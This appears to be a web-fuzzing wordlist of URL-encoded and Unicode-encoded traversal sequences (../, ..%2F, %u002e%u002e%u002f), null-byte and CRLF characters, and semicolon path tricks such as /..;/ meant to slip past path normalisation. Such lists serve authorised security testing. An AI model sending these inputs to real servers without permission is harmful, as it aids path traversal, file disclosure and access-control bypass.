%00
%0a
%0d
%2e
%2e%2e
%2e%2f
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2f%2e%2f
%2e%5c
%2e%5c%2e%5c
%2e%2e%5c
%2e%2e%5c%2e%2e%5c
%5c
%u002e
%u002e%u002e
%u002e%u002f
%u002e%u002e%u002f
%u002e%u002e%u002f%u002e%u002e%u002f
%u002e%u002f%u002e%u002f
%u002e%u005c
%u002e%u005c%u002e%u005c
%u002e%u002e%u005c
%u002e%u002e%u005c%u002e%u002e%u005c
%u005c
%u002f%u003b%u002f
.
..
./
../
../../
././
.\
.\.\
..\
..\..\
\
-
!
@
#
$
%
^
&
*
(
)
_
?
+
>
<
}
{
[
]
~
·
.%2F
..%2F
..%2F..%2F
.%2F.%2F
.%5C
.%5C.%5C
..%5C
..%5C..%5C
%5C
%40
%23
%24
%25
%5E
%26
%2B
%3E
%3C
%7D
%7B
%5B
%5D
%7E
%C2%B7
%21
%2A
%28
%29
%3f
%2F%3B%2F
%2F..%3B%2F
%3B..%2F
%2F%3B..%2F
%3B
%3B%2F..%2F%3B
%2F%2F..%2F%2F
%5C%5C..%5C%5C
%5C%5C.%5C%5C
%2F%2F.%2F%2F
%3B%2F%3B%2F
/;/
/..;/
%u002f%u002e%u002e%u003b%u002f
;../
%u003b%u002e%u002e%u002f
/;../
%u002f%u003b%u002e%u002e%u002f
;
%u003b
;/../;
%u003b%u002f%u002e%u002e%u002f%u003b
//..//
%u002f%u002f%u002e%u002e%u002f%u002f
\\..\\
%u005c%u005c%u002e%u002e%u005c%u005c
\\.\\
%u005c%u005c%u002e%u005c%u005c
//.//
%u002f%u002f%u002e%u002f%u002f
;/;/
%u003b%u002f%u003b%u002f
/%3B/
/..%3B/
%3B../
/%3B../
%3B/../%3B
%3B/%3B/